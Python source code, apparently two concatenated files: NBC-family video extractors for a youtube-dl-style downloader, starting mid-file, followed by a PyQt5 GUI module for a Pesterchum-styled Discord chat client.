respect\' for Duke', 'description': 'md5:ecb459c9d59e0766ac9c7d5d0eda8113', 'uploader': 'NBCU-SPORTS', 'upload_date': '20150330', 'timestamp': 1427726529, } } def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) return self.url_result( NBCSportsVPlayerIE._extract_url(webpage), 'NBCSportsVPlayer') class CSNNEIE(InfoExtractor): _VALID_URL = r'https?://www\.csnne\.com/video/(?P<id>[0-9a-z-]+)' _TEST = { 'url': 'http://www.csnne.com/video/snc-evening-update-wright-named-red-sox-no-5-starter', 'info_dict': { 'id': 'yvBLLUgQ8WU0', 'ext': 'mp4', 'title': 'SNC evening update: Wright named Red Sox\' No. 5 starter.', 'description': 'md5:1753cfee40d9352b19b4c9b3e589b9e3', 'timestamp': 1459369979, 'upload_date': '20160330', 'uploader': 'NBCU-SPORTS', } } def _real_extract(self, url): display_id = self._match_id(url) webpage = self._download_webpage(url, display_id) return { '_type': 'url_transparent', 'ie_key': 'ThePlatform', 'url': self._html_search_meta('twitter:player:stream', webpage), 'display_id': display_id, } class NBCNewsIE(ThePlatformIE): _VALID_URL = r'''(?x)https?://(?:www\.)?(?:nbcnews|today|msnbc)\.com/ (?:video/.+?/(?P<id>\d+)| ([^/]+/)*(?:.*-)?(?P<mpx_id>[^/?]+)) ''' _TESTS = [ { 'url': 'http://www.nbcnews.com/video/nbc-news/52753292', 'md5': '47abaac93c6eaf9ad37ee6c4463a5179', 'info_dict': { 'id': '52753292', 'ext': 'flv', 'title': 'Crew emerges after four-month Mars food study', 'description': 'md5:24e632ffac72b35f8b67a12d1b6ddfc1', }, }, { 'url': 'http://www.nbcnews.com/watch/nbcnews-com/how-twitter-reacted-to-the-snowden-interview-269389891880', 'md5': 'af1adfa51312291a017720403826bb64', 'info_dict': { 'id': '269389891880', 'ext': 'mp4', 'title': 'How Twitter Reacted To The Snowden Interview', 'description': 'md5:65a0bd5d76fe114f3c2727aa3a81fe64', 'uploader': 'NBCU-NEWS', 'timestamp': 1401363060, 'upload_date': '20140529', }, }, { 'url': 'http://www.nbcnews.com/feature/dateline-full-episodes/full-episode-family-business-n285156', 'md5': 'fdbf39ab73a72df5896b6234ff98518a', 'info_dict': { 'id': '529953347624', 'ext': 'mp4', 'title': 'FULL EPISODE: Family Business', 'description': 'md5:757988edbaae9d7be1d585eb5d55cc04', }, 'skip': 'This page is unavailable.', }, { 'url': 'http://www.nbcnews.com/nightly-news/video/nightly-news-with-brian-williams-full-broadcast-february-4-394064451844', 'md5': '73135a2e0ef819107bbb55a5a9b2a802', 'info_dict': { 'id': '394064451844', 'ext': 'mp4', 'title': 'Nightly News with Brian Williams Full Broadcast (February 4)', 'description': 'md5:1c10c1eccbe84a26e5debb4381e2d3c5', 'timestamp': 1423104900, 'uploader': 'NBCU-NEWS', 'upload_date': '20150205', }, }, { 'url': 'http://www.nbcnews.com/business/autos/volkswagen-11-million-vehicles-could-have-suspect-software-emissions-scandal-n431456', 'md5': 'a49e173825e5fcd15c13fc297fced39d', 'info_dict': { 'id': '529953347624', 'ext': 'mp4', 'title': 'Volkswagen U.S. Chief:\xa0 We Have Totally Screwed Up', 'description': 'md5:c8be487b2d80ff0594c005add88d8351', 'upload_date': '20150922', 'timestamp': 1442917800, 'uploader': 'NBCU-NEWS', }, }, { 'url': 'http://www.today.com/video/see-the-aurora-borealis-from-space-in-stunning-new-nasa-video-669831235788', 'md5': '118d7ca3f0bea6534f119c68ef539f71', 'info_dict': { 'id': '669831235788', 'ext': 'mp4', 'title': 'See the aurora borealis from space in stunning new NASA video', 'description': 'md5:74752b7358afb99939c5f8bb2d1d04b1', 'upload_date': '20160420', 'timestamp': 1461152093, 'uploader': 'NBCU-NEWS', }, }, { 'url': 'http://www.msnbc.com/all-in-with-chris-hayes/watch/the-chaotic-gop-immigration-vote-314487875924', 'md5': '6d236bf4f3dddc226633ce6e2c3f814d', 'info_dict': { 'id': '314487875924', 'ext': 'mp4', 'title': 'The chaotic GOP immigration vote', 'description': 'The Republican House votes on a border bill that has no chance of getting through the Senate or signed by the President and is drawing criticism from all sides.', 'thumbnail': 're:^https?://.*\.jpg$', 'timestamp': 1406937606, 'upload_date': '20140802', 'uploader': 'NBCU-NEWS', 'categories': ['MSNBC/Topics/Franchise/Best of last night', 'MSNBC/Topics/General/Congress'], }, }, { 'url': 'http://www.nbcnews.com/watch/dateline/full-episode--deadly-betrayal-386250819952', 'only_matching': True, }, { # From http://www.vulture.com/2016/06/letterman-couldnt-care-less-about-late-night.html 'url': 'http://www.nbcnews.com/widget/video-embed/701714499682', 'only_matching': True, }, ] def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') if video_id is not None: all_info = self._download_xml('http://www.nbcnews.com/id/%s/displaymode/1219' % video_id, video_id) info = all_info.find('video') return { 'id': video_id, 'title': info.find('headline').text, 'ext': 'flv', 'url': find_xpath_attr(info, 'media', 'type', 'flashVideo').text, 'description': info.find('caption').text, 'thumbnail': find_xpath_attr(info, 'media', 'type', 'thumbnail').text, } else: # "feature" and "nightly-news" pages use theplatform.com video_id = mobj.group('mpx_id') if not video_id.isdigit(): webpage = self._download_webpage(url, video_id) info = None bootstrap_json = self._search_regex( [r'(?m)(?:var\s+(?:bootstrapJson|playlistData)|NEWS\.videoObj)\s*=\s*({.+});?\s*$', r'videoObj\s*:\s*({.+})', r'data-video="([^"]+)"'], webpage, 'bootstrap json', default=None) bootstrap = self._parse_json( bootstrap_json, video_id, transform_source=unescapeHTML) if 'results' in bootstrap: info = bootstrap['results'][0]['video'] elif 'video' in bootstrap: info = bootstrap['video'] else: info = bootstrap video_id = info['mpxId'] return { '_type': 'url_transparent', 'id': video_id, # http://feed.theplatform.com/f/2E2eJC/nbcnews also works 'url': 'http://feed.theplatform.com/f/2E2eJC/nnd_NBCNews?byId=%s' % video_id, 'ie_key': 'ThePlatformFeed', } class NBCOlympicsIE(InfoExtractor): _VALID_URL = r'https?://www\.nbcolympics\.com/video/(?P<id>[a-z-]+)' _TEST = { # Geo-restricted to US 'url': 'http://www.nbcolympics.com/video/justin-roses-son-leo-was-tears-after-his-dad-won-gold', 'md5': '54fecf846d05429fbaa18af557ee523a', 'info_dict': { 'id': 'WjTBzDXx5AUq', 'display_id': 'justin-roses-son-leo-was-tears-after-his-dad-won-gold', 'ext': 'mp4', 'title': 'Rose\'s son Leo was in tears after his dad won gold', 'description': 'Olympic gold medalist Justin Rose gets emotional talking to the impact his win in men\'s golf has already had on his children.', 'timestamp': 1471274964, 'upload_date': '20160815', 'uploader': 'NBCU-SPORTS', }, } def _real_extract(self, url): display_id = self._match_id(url) webpage = self._download_webpage(url, display_id) drupal_settings = self._parse_json(self._search_regex( r'jQuery\.extend\(Drupal\.settings\s*,\s*({.+?})\);', webpage, 'drupal settings'), display_id) iframe_url = drupal_settings['vod']['iframe_url'] theplatform_url = iframe_url.replace( 'vplayer.nbcolympics.com', 'player.theplatform.com') return { '_type': 'url_transparent', 'url': theplatform_url, 'ie_key': ThePlatformIE.ie_key(), 'display_id': display_id, }
#!/usr/bin/env python3 # Copyright (c) 2016-2020, henry232323 # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. from asyncio import ensure_future from contextlib import redirect_stdout from inspect import isawaitable from io import StringIO, BytesIO from sys import exit as sysexit from traceback import format_exc import discord import simpleaudio as sa from PyQt5 import uic from PyQt5.QtCore import Qt, pyqtSlot, QUrl from PyQt5.QtGui import QIcon, QTextCursor, QStandardItem, QColor, QBrush, QTextDocument, QImage from PyQt5.QtWidgets import QDialog, QWidget, QListWidgetItem, QComboBox, QHeaderView, QTableWidgetItem, QAction, QMenu from async_timeout import timeout from formatting import * class PrivateMessageWidget(QWidget): def __init__(self, app, parent, user, name): """ The widget within each tab of TabWindow, a display for new private messages and user input """ super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/PrivateMessageWidget.ui", self) self.user = user self.app = app self.parent = parent # setattr(user, "display_name", friend) self.userLabel.setText(name.join(["::", "::"])) self.sendButton.clicked.connect(self.send) self.userOutput.setReadOnly(True) self.userOutput.setMouseTracking(True) self.userOutput.anchorClicked.connect(self.anchorClicked) self.userOutput.setOpenLinks(False) if isinstance(user, discord.DMChannel): self.display_text(fmt_begin_msg(app, self.app.client.user, user.recipient)) ensure_future(self.get_logs()) @pyqtSlot(QUrl) def anchorClicked(self, url): urlstr = url.toString() if urlstr.startswith("mention="): id = urlstr[8:] user = discord.utils.get(self.app.client.get_all_members(), id=int(id)) if user.id != self.app.client.user.id: self.app.gui.start_privmsg(user) elif urlstr.startswith("channel="): id = urlstr[8:] channel = discord.utils.get(self.memo.guild.channels, id=int(id)) if channel.id != self.memo.id: self.parent.tabWidget.setCurrentIndex(self.parent.channels.index(channel)) elif urlstr.startswith("role="): pass async def get_logs(self): ms = "" for message in reversed(await self.user.history(limit=100).flatten()): fmt = fmt_disp_msg(self.app, message.content, message, user=message.author) ms += fmt self.display_text(ms) sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "alarm.wav")).play() def send(self): """Send the user the message in the userInput box, called on enter press / send button press""" msg = self.userInput.text() if msg: self.app.send_msg(msg, self.user) self.userInput.setText("") def display_text(self, msg): '''Insert msg into the display box''' msg = msg.replace("\n", "<br />") msg = re.sub(r'(?<!\\)\*\*(.*?[^\\])\*\*', r"<strong>\1</strong>", msg) msg = re.sub(r'(?<!\\)\*(.*?[^\\])\*', r"<i>\1</i>", msg) msg = re.sub(r'(?<!\\)```(.*?[^\\])```', r"<code>\1</code>", msg) msg = re.sub(r'(?<!\\)`(.*?[^\\])`', r"<code>\1</code>", msg) msg = re.sub(r'(?<!\\)~~(.*?[^\\])`', r"<s>\1</s>", msg) cursor = self.userOutput.textCursor() cursor.movePosition(QTextCursor.End) self.userOutput.setTextCursor(cursor) self.userOutput.insertHtml(msg) def keyPressEvent(self, event): '''Use enter key to send''' if event.key() == Qt.Key_Return: self.send() class TabWindow(QWidget): def __init__(self, app, parent, user): """ A window for storing PrivateMessageWidget instances, a navigation between current private message users """ super(__class__, self).__init__() self.parent = parent self.app = app uic.loadUi(app.theme["ui_path"] + "/TabWindow.ui", self) self.users = [] self.ids = [] self.init_user = self.add_user(user) self.tabWidget.removeTab(0) # Remove two default tabs self.tabWidget.removeTab(0) self.tabWidget.setTabsClosable(True) self.tabWidget.tabCloseRequested.connect(self.closeTab) self.setWindowTitle("Private Message") self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.show() def closeTab(self, currentIndex): widget = self.tabWidget.widget(currentIndex) widget.deleteLater() self.tabWidget.removeTab(currentIndex) self.users.remove(widget.user) if not self.users: self.close() sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "cease.wav")).play() def closeEvent(self, event): event.accept() self.app.gui.tabWindow = None def add_user(self, user): """ Add a user & PrivateMessageWidget to window, check if it is already there if so, return that user's PM, if not, create and return a PM On PrivateMessageWidget creation, send a PESTERCHUM:BEGIN initiation message :rtype: `PrivateMessageWidget` :param user: The `discord.User` to message """ if user.id not in self.ids: if isinstance(user, discord.User): name = user.display_name elif isinstance(user, discord.GroupChannel): if not user.name: name = ", ".join(map(lambda c: c.display_name, user.recipients)) else: name = user.name else: name = user.recipient.display_name windw = PrivateMessageWidget(self.app, self, user, name) icon = QIcon("resources/pc_chummy.png") a = self.tabWidget.addTab(windw, icon, name) tab = self.tabWidget.widget(a) self.users.append(user) self.ids.append(user.id) return tab else: return self.tabWidget.widget(self.ids.index(user.id)) class AddFriendDialog(QDialog): def __init__(self, app, parent): """ Dialog opened when the Add [Chum] button is pressed, adds to chumsTree widget """ super(__class__, self).__init__() self.parent = parent self.app = app uic.loadUi(self.app.theme["ui_path"] + "/AddFriendDialog.ui", self) self.setWindowTitle('Add Chum') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.acceptButton.clicked.connect(self.accepted) self.rejectButton.clicked.connect(self.close) self.exec_() def accepted(self): '''Call once accepted, check if name is alphanumeric if not warn and try again''' user = self.addChumInput.text() if user: self.app.add_friend(user) self.close() class AddBlockedDialog(QDialog): def __init__(self, app, parent): ''' Dialog opened when the Add button is pressed in TROLLSLUM, adds to parent.blockedList widget ''' super(__class__, self).__init__() self.parent = parent self.app = app uic.loadUi(self.app.theme["ui_path"] + "/AddBlockedDialog.ui", self) self.setWindowTitle('TROLLSLUM') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.acceptButton.clicked.connect(self.accepted) self.rejectButton.clicked.connect(self.close) self.exec_() def accepted(self): '''Call once accepted, check if name is alphanumeric if not warn and try again''' user = self.addChumInput.text() if user and (user not in self.app.blocked): self.app.add_blocked(user) item = QListWidgetItem(user) self.parent.blockedList.addItem(item) if user in self.app.friends.keys(): index = self.app.gui.chumsTree.indexOfTopLevelItem(self.app.gui.getFriendItem(user)[0]) self.app.gui.chumsTree.takeTopLevelItem(index) self.close() else: self.close() class BlockedDialog(QDialog): def __init__(self, app, parent): super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/BlockedDialog.ui", self) self.app = app self.parent = parent self.setWindowTitle('TROLLSLUM') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.addBlockButton.clicked.connect(self.add) self.removeBlockButton.clicked.connect(self.remove) for user in self.app.blocked: self.blockedList.addItem(QListWidgetItem(user)) self.exec_() def add(self): dialog = AddBlockedDialog(self.app, self) def remove(self): selected = self.blockedList.selectedItems() if selected: item = selected[0] index = self.blockedList.indexFromItem(item) self.blockedList.takeItem(index.row()) user = item.text() self.app.blocked.remove(user) if user in self.app.friends.keys(): treeitem = QStandardItem(user) treeitem.setText(user) treeitem.setIcon(QIcon(self.app.theme["path"] + "/offline.png")) self.app.gui.friendsModel.appendRow(treeitem) class OptionsWindow(QWidget): def __init__(self, app, parent): super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/OptionsWindow.ui", self) self.app = app self.parent = parent self.setWindowTitle('Options') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.options = self.app.options width = self.frameGeometry().width() height = self.frameGeometry().height() self.setFixedSize(width, height) self.buttons = (self.optionsButton1, self.optionsButton2, self.optionsButton3, self.optionsButton4, self.optionsButton5, self.optionsButton6, self.optionsButton7, self.optionsButton8) for index, button in enumerate(self.buttons): button.clicked.connect(self.make_call(index, button)) self.acceptButton.clicked.connect(self.saveConfig) self.rejectButton.clicked.connect(self.close) self.themesComboBox.addItems(self.app.themes.keys()) self.themesComboBox.setInsertPolicy(QComboBox.InsertAlphabetically) index = self.themesComboBox.findText(self.app.theme_name) self.themesComboBox.setCurrentIndex(index) self.refreshThemeButton.clicked.connect( lambda: self.app.change_theme(self.themesComboBox.currentText(), f=True)) convo_opt = self.options["conversations"] chum_opt = self.options["chum_list"] interface_opt = self.options["interface"] # Chum List self.hideOfflineRadio.setChecked(chum_opt["hide_offline_chums"]) self.showEmptyRadio.setChecked(chum_opt["show_empty_groups"]) self.showNumberRadio.setChecked(chum_opt["show_number_of_online_chums"]) self.sortChumsCombo.addItems(("Alphabetically", "Mood")) self.sortChumsCombo.setCurrentIndex(chum_opt["sort_chums"]) self.lowBandwidthRadio.setChecked(chum_opt["low_bandwidth"]) # Conversations self.timeStampsRadio.setChecked(convo_opt["time_stamps"]) self.showSecondsRadio.setChecked(convo_opt["show_seconds"]) self.opVoiceMemoRadio.setChecked(convo_opt["op_and_voice_in_memos"]) self.animatedSmiliesRadio.setChecked(convo_opt["use_animated_smilies"]) self.randomEncountersRadio.setChecked(convo_opt["receive_random_encounters"]) self.clockTypeComboBox.addItems(('12', '24')) self.clockTypeComboBox.setCurrentIndex(convo_opt["clock_type"]) # Interface self.tabbedConvoBox.setChecked(interface_opt["tabbed_conversations"]) self.tabbedMemoBox.setChecked(interface_opt["tabbed_memos"]) self.blinkPesterBox.setChecked(interface_opt["blink_taskbar_on_pesters"]) self.blinkMemoBox.setChecked(interface_opt["blink_taskbar_on_memos"]) self.minimizeCombo.addItems(('Minimize to Taskbar', 'Minimize to Tray', 'Quit')) self.minimizeCombo.setCurrentIndex(interface_opt["minimize"]) self.closeCombo.addItems(('Minimize to Taskbar', 'Minimize to Tray', 'Quit')) self.closeCombo.setCurrentIndex(interface_opt["close"]) # Updates self.pesterchumUpdatesCheck.setChecked(int(interface_opt["auto_update"])) self.show() def saveConfig(self): oldtheme = self.app.theme_name try: # Chum List self.options["chum_list"]["hide_offline_chums"] = self.hideOfflineRadio.isChecked() self.options["chum_list"]["show_empty_groups"] = self.showEmptyRadio.isChecked() self.options["chum_list"]["show_number_of_online_chums"] = self.showNumberRadio.isChecked() self.options["chum_list"]["sort_chums"] = self.sortChumsCombo.currentIndex() self.options["chum_list"]["low_bandwidth"] = self.lowBandwidthRadio.isChecked() # Conversations self.options["conversations"]["time_stamps"] = self.timeStampsRadio.isChecked() self.options["conversations"]["show_seconds"] = self.showSecondsRadio.isChecked() self.options["conversations"]["op_and_voice_in_memos"] = self.opVoiceMemoRadio.isChecked() self.options["conversations"]["use_animated_smilies"] = self.animatedSmiliesRadio.isChecked() self.options["conversations"]["receive_random_encounters"] = self.randomEncountersRadio.isChecked() self.options["conversations"]["clock_type"] = self.clockTypeComboBox.currentIndex() # Interface self.options["interface"]["tabbed_conversations"] = self.tabbedConvoBox.isChecked() self.options["interface"]["tabbed_memos"] = self.tabbedMemoBox.isChecked() self.options["interface"]["blink_taskbar_on_pesters"] = self.blinkPesterBox.isChecked() self.options["interface"]["blink_taskbar_on_memos"] = self.blinkMemoBox.isChecked() self.options["interface"]["minimize"] = self.minimizeCombo.currentIndex() self.options["interface"]["close"] = self.closeCombo.currentIndex() # Updates self.options["interface"]["auto_update"] = self.pesterchumUpdatesCheck.isChecked() self.app.change_theme(self.themesComboBox.currentText()) # Theme self.options["theme"]["theme"] = self.themesComboBox.currentText() except Exception as e: self.errorLabel.setText("Error changing theme: \n{}".format(e)) self.app.change_theme(oldtheme) print(e) self.close() def make_call(self, index, button): def setIndex(): self.stackedWidget.setCurrentIndex(index) button.setChecked(True) for Button in self.buttons: if button != Button: Button.setChecked(False) return setIndex class MemosWindow(QWidget): def __init__(self, app, parent): super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/MemoWindow.ui", self) self.app = app self.parent = parent self.setWindowTitle('Memos') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) # width = self.frameGeometry().width() # height = self.frameGeometry().height() # self.setFixedSize(width, height) self.memosTableWidget.setColumnCount(2) self.memosTableWidget.setHorizontalHeaderLabels(["Memo", "Users"]) self.memosTableWidget.doubleClicked.connect(self.openMemo) header = self.memosTableWidget.horizontalHeader() header.setSectionResizeMode(QHeaderView.Stretch) self.ctr = 0 self.open = dict() for guild in self.app.client.guilds: self.add_channel(guild.name, len(guild.members)) self.memosTableWidget.sortItems(0) self.joinMemoButton.clicked.connect(self.join_button) self.show() def join_button(self): try: name = self.memoNameLineEdit.text() if name: items = self.memosTableWidget.findItems(name, Qt.MatchExactly) self.openMemo(self.memosTableWidget.indexFromItem(items[0])) else: selected = self.memosTableWidget.selectedItems() if not selected: return else: self.openMemo(self.memosTableWidget.indexFromItem(selected[0])) except: import traceback traceback.print_exc() def display_message(self, channel, message): win = self.getWindow(channel.guild) win.display_message(channel, message) def getWindow(self, guild): if isinstance(guild, discord.Guild): return self.open[guild] elif isinstance(guild, str): return discord.utils.get(self.app.client.guilds, name=guild) else: return None def openMemo(self, index): if index.column(): index = index.sibling(index.row(), 0) item = self.memosTableWidget.itemFromIndex(index) guild = discord.utils.get(self.app.client.guilds, name=item.text()) tab = MemoTabWindow(self.app, self, guild) self.open[guild] = tab return tab.memo def add_channel(self, memo, usercount): self.memosTableWidget.insertRow(self.ctr) icn = QIcon(self.app.theme["path"] + "/memo.png") mitem = QTableWidgetItem(icn, memo) mitem.setFlags(Qt.ItemFlags(Qt.ItemIsSelectable) | Qt.ItemFlags(Qt.ItemIsEnabled)) uitem = QTableWidgetItem() uitem.setData(0, usercount) uitem.setTextAlignment(2) uitem.setFlags(Qt.ItemFlags(Qt.ItemIsSelectable) | Qt.ItemFlags(Qt.ItemIsEnabled)) self.memosTableWidget.setItem(self.ctr, 0, mitem) self.memosTableWidget.setItem(self.ctr, 1, uitem) self.ctr += 1 def closeEvent(self, event): event.accept() self.app.gui.memosWindow = None class MemoMessageWidget(QWidget): def __init__(self, app, container, parent, memo): """ The widget within each tab of TabWindow, a display for new private messages and user input """ super(__class__, self).__init__() self.parent = parent self.names = [] uic.loadUi(app.theme["ui_path"] + "/MemoMessageWidget.ui", self) self.memo = memo self.app = app self.container = container self.names = self.memo.guild.members self.memoUsers.setContextMenuPolicy(Qt.CustomContextMenu) self.memoUsers.customContextMenuRequested.connect(self.openMemoMenu) self.messageContext = QAction("MESSAGE") self.messageContext.triggered.connect(self.message_user) self.blockContext = QAction("BLOCK") self.blockContext.triggered.connect(self.block_user) self.blockContext = QAction("UNBLOCK") self.blockContext.triggered.connect(self.unblock_user) self.friendContext = QAction("ADD FRIEND") self.friendContext.triggered.connect(self.send_friend_request) self.removeContext = QAction("REMOVE FRIEND") self.removeContext.triggered.connect(self.remove_friend) self.userLabel.setText(memo.name.join(["::", "::"])) self.sendButton.clicked.connect(self.send) self.userOutput.setReadOnly(True) self.userOutput.setMouseTracking(True) self.userOutput.anchorClicked.connect(self.anchorClicked) self.userOutput.setOpenLinks(False) self.userOutput.document().setDefaultStyleSheet(self.app.theme["styles"]) self.userOutput.setHtml("<body>\n</body>") if not self.memo.permissions_for(self.memo.guild.me).send_messages: self.userInput.setReadOnly(True) ensure_future(self.load_emojis()) ensure_future(self.get_logs()) async def load_emojis(self): for emoji in self.memo.guild.emojis: with timeout(10): bop = BytesIO() await emoji.url.save(bop) qmg = QImage() qmg.loadFromData(bop.getvalue()) self.userOutput.document().addResource(QTextDocument.ImageResource, QUrl(str(emoji.url)), qmg) @pyqtSlot(QUrl) def anchorClicked(self, url): urlstr = url.toString() if urlstr.startswith("mention="): id = urlstr[8:] user = discord.utils.get(self.app.client.get_all_members(), id=int(id)) if user.id != self.app.client.user.id: self.app.gui.start_privmsg(user) elif urlstr.startswith("channel="): id = urlstr[8:] channel = discord.utils.get(self.memo.guild.channels, id=int(id)) if channel.id != self.memo.id: self.parent.tabWidget.setCurrentIndex(self.parent.channels.index(channel)) elif urlstr.startswith("role="): pass async def get_logs(self): ms = "" for message in reversed(await self.memo.history(limit=100).flatten()): fmt = fmt_disp_msg(self.app, message.content, message, user=message.author) ms += fmt self.display_text(ms) def send(self): """Send the user the message in the userInput box, called on enter press / send button press""" msg = self.userInput.text() if msg.strip(): self.app.send_msg(msg, self.memo) self.userInput.setText("") def display_text(self, msg): '''Insert msg into the display box''' msg = msg.replace("\n", "<br />") msg = re.sub(r'(?<!\\)\*\*(.*?[^\\])\*\*', r"<strong>\1</strong>", msg) msg = re.sub(r'(?<!\\)\*(.*?[^\\])\*', r"<i>\1</i>", msg) msg = re.sub(r'(?<!\\)```(.*?[^\\])```', r"<code>\1</code>", msg) msg = re.sub(r'(?<!\\)`(.*?[^\\])`', r"<code>\1</code>", msg) msg = re.sub(r'(?<!\\)~~(.*?[^\\])`', r"<s>\1</s>", msg) cursor = self.userOutput.textCursor() cursor.movePosition(QTextCursor.End) self.userOutput.setTextCursor(cursor) self.userOutput.insertHtml(msg) def keyPressEvent(self, event): '''Use enter key to send''' if event.key() == Qt.Key_Return: self.send() def openMemoMenu(self, position): menu = QMenu() selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if self.app.client.user.bot and member is not self.memo.guild.me: menu.addAction(self.messageContext) elif member is not self.memo.guild.me: menu.addAction(self.messageContext) if member.is_friend(): menu.addAction(self.removeContext) else: menu.addAction(self.friendContext) if member.is_blocked(): menu.addAction(self.removeBlockContext) else: menu.addAction(self.blockContext) else: return menu.exec_(self.memoUsers.viewport().mapToGlobal(position)) def message_user(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(self.app.gui.start_pm(member)) def block_user(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.block()) def unblock_user(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.unblock()) def send_friend_request(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.send_friend_request()) def remove_friend(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.remove_friend()) class MemoTabWindow(QWidget): def __init__(self, app, parent, memo): """ A window for storing PrivateMessageWidget instances, a navigation between current private message users """ super(__class__, self).__init__() self.parent = parent self.app = app uic.loadUi(app.theme["ui_path"] + "/MemoTabWindow.ui", self) self.memo = memo # Filter channels by read permission self.channels = list(filter(lambda x: x.permissions_for(x.guild.me).read_messages, self.memo.text_channels)) # Remove two default tabs self.tabWidget.removeTab(0) self.tabWidget.removeTab(0) self.setWindowTitle("Memos") self.setWindowIcon(QIcon(self.app.theme["path"] + "/memo.png")) for channel in self.channels: self.add_memo(channel) self.add_user_items() self.show() sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "alarm2.wav")).play() def closeEvent(self, event): """On window (or tab) close send a PESTERCHUM:CEASE message to each user, destroy self""" del self.parent.open[self.memo] event.accept() sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "cease.wav")).play() def display_message(self, channel, message): self.getWidget(channel).display_text(message) def getWidget(self, guild): try: idx = self.channels.index(guild) return self.tabWidget.widget(idx) except IndexError as e: print(e) def add_memo(self, memo): ''' Add a user & PrivateMessageWidget to window, check if it is already there if so, return that user's PM, if not, create and return a PM On PrivateMessageWidget creation, send a PESTERCHUM:BEGIN initiation message ''' windw = MemoMessageWidget(self.app, self.tabWidget, self, memo) icon = QIcon(self.app.theme["path"] + "/memo.png") a = self.tabWidget.addTab(windw, icon, memo.name) tab = self.tabWidget.widget(a) return tab def add_user_items(self): for member in sorted(self.memo.members, key=lambda x: (max([r.position for r in x.roles if r.hoist], default=0), x.display_name), reverse=True): nam = QListWidgetItem(member.display_name) clra = member.color clr = QBrush() clr.setColor(QColor(clra.r, clra.g, clra.b)) nam.setForeground(clr) if member.top_role.permissions.administrator: nam.setIcon(QIcon(self.app.theme["path"] + "/op.png")) widget = self.tabWidget.widget(0) widget.memoUsers.addItem(nam) class AuthDialog(QDialog): def __init__(self, app, parent, f=False, i=True): """ Dialog opened when the Add [Chum] button is pressed, adds to chumsTree widget """ super(__class__, self).__init__() self.parent = parent self.app = app self.i = i self.fin = False uic.loadUi(self.app.theme["ui_path"] + "/AuthDialog.ui", self) self.setWindowTitle('Auth') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.acceptButton.clicked.connect(self.accepted) self.acceptButton.setDefault(True) self.closeButton.clicked.connect(self.rejected) if f: self.errorLabel.setText( """Invalid token! Failed to login. Make sure if you are using a bot to check the bot account check""") else: self.errorLabel.setText("""Discord no longer allows usernames/passwords! Check the README for how to find yours!""") self.auth = None self.exec_() def accepted(self): token = self.tokenEdit.text().strip("\"") bot = self.botCheck.isChecked() self.auth = (token, bot) if not token: return else: self.fin = True self.close() def rejected(self): if hasattr(self.app, "gui"): self.close() else: self.app.exit() def closeEvent(self, event): if self.i and not self.fin: event.accept() self.app.exit() else: event.accept() class QuirksWindow(QWidget): def __init__(self, app): super(__class__, self).__init__() self.app = app uic.loadUi(self.app.theme["ui_path"] + "/QuirksWindow.ui", self) self.addQuirkButton.clicked.connect(self.openQuirk) self.editQuirkButton.clicked.connect(self.editQuirk) self.removeQuirkButton.clicked.connect(self.removeQuirk) self.cancelButton.clicked.connect(self.closeWin) self.okButton.clicked.connect(self.save) self.testButton.clicked.connect(self.testQuirks) for type, quirk in self.app.quirks.quirks: self.quirksList.addItem("{}:{}".format(type, quirk)) self.setWindowTitle('Quirks') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.show() def openQuirk(self): AddQuirkWindow(self.app, self) def editQuirk(self): pass def removeQuirk(self): items = self.quirksList.selectedItems() for item in items: row = self.quirksList.indexFromItem(item).row() self.app.quirks.quirks.pop(row) self.quirksList.takeItem(row) def closeWin(self): self.close() def save(self): self.close() def testQuirks(self): pass class AddQuirkWindow(QWidget): def __init__(self, app, parent): super(__class__, self).__init__() self.app = app self.parent = parent uic.loadUi(self.app.theme["ui_path"] + "/AddQuirkWindow.ui", self) self.buttons = ('opts', 'prefix', 'suffix', 'replace', 'regex', 'random') 